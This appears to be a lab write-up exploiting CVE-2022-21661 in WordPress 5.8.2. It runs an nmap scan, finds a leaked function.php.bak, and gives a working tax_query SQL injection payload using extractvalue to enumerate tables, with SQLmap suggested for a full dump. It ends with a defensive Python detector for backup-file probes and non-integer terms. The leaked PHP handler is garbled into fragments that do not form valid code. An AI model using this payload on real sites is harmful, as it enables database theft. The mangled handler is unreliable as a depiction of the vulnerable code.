$ sudo nmap -sS 10.20.24.35/32
Starting Nmap 7.92 ( https://nmap.org ) at 2022-01-24 01:12 EST
Nmap scan report for 10.20.24.35
Host is up (0.00015s latency).
Not shown: 998 closed tcp ports (reset)
PORT STATE SERVICE
22/tcp open ssh
80/tcp open http
Step 2: A directory scan reveals a sensitive information leak, which sets up the SQL injection vulnerability exploited later.
http://10.20.24.35/function.php.bak
// Leaked handler: JSON supplied by the client in $_POST['data'] reaches WP_Query unsanitized
function wp_query_test(){
    _POST['data']);
    c, true);
    d);
    wp_die();
}
// wp_ajax_nopriv_* registers the 'test' action for unauthenticated visitors
add_action('wp_ajax_nopriv_test','wp_query_test',1);
WordPress 5.8.2 is affected by CVE-2022-21661, and the leaked file reveals the request's parameter key. Building the payload accordingly gives:
action=test&data={"tax_query":[{"field":"term_taxonomy_id","terms":["1) and extractvalue(rand(),concat(0x3a,(select group_concat(table_name) from information_schema.tables where table_schema=database())))-- "]}]}
The injection point can then be handed straight to SQLmap to dump the database.
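As an added, defender-side example that is not part of the original writeup: a small Python checker that flags the two request patterns this attack chain depends on, requests for leftover backup files such as function.php.bak and admin-ajax.php calls whose term_taxonomy_id terms are not plain integers (the input that CVE-2022-21661 turns into SQL). The admin-ajax.php path, the sample request list and the label names are assumptions.

```python
import json
import re
from urllib.parse import parse_qs

# Constructed sample requests (method, path, POST body); not captured from any real system.
SAMPLE_REQUESTS = [
    ("GET", "/function.php.bak", ""),
    ("POST", "/wp-admin/admin-ajax.php",
     'action=test&data={"tax_query":[{"field":"term_taxonomy_id","terms":["1) and '
     'extractvalue(rand(),concat(0x3a,(select group_concat(table_name) from '
     'information_schema.tables where table_schema=database())))-- "]}]}'),
    ("POST", "/wp-admin/admin-ajax.php",
     'action=test&data={"tax_query":[{"field":"term_taxonomy_id","terms":["1","2"]}]}'),
    ("GET", "/index.php", ""),
]

# Suffixes that usually mean a source/backup copy was left in the web root (assumed list)
BACKUP_SUFFIXES = (".bak", ".old", ".orig", ".swp", "~")
INT_TERM = re.compile(r"^\d+$")


def non_integer_terms(body: str) -> list[str]:
    """Return tax_query terms for field term_taxonomy_id that are not plain integers.
    Legitimate term_taxonomy_id values are integers; anything else is an injection attempt."""
    raw = parse_qs(body).get("data", [""])[0]
    try:
        query = json.loads(raw)
    except json.JSONDecodeError:
        return []
    if not isinstance(query, dict):
        return []
    bad = []
    for clause in query.get("tax_query", []):
        if not isinstance(clause, dict) or clause.get("field") != "term_taxonomy_id":
            continue
        terms = clause.get("terms", [])
        terms = terms if isinstance(terms, list) else [terms]
        bad.extend(str(t) for t in terms if not INT_TERM.match(str(t)))
    return bad


def classify(method: str, path: str, body: str) -> str:
    """Label one request: backup-file probe, tax_query SQL injection attempt, or ok."""
    if path.endswith(BACKUP_SUFFIXES):
        return "backup-file-probe"
    if method == "POST" and path.endswith("/admin-ajax.php") and non_integer_terms(body):
        return "tax-query-sqli"
    return "ok"


def scan(requests=SAMPLE_REQUESTS) -> list[str]:
    return [classify(*r) for r in requests]
```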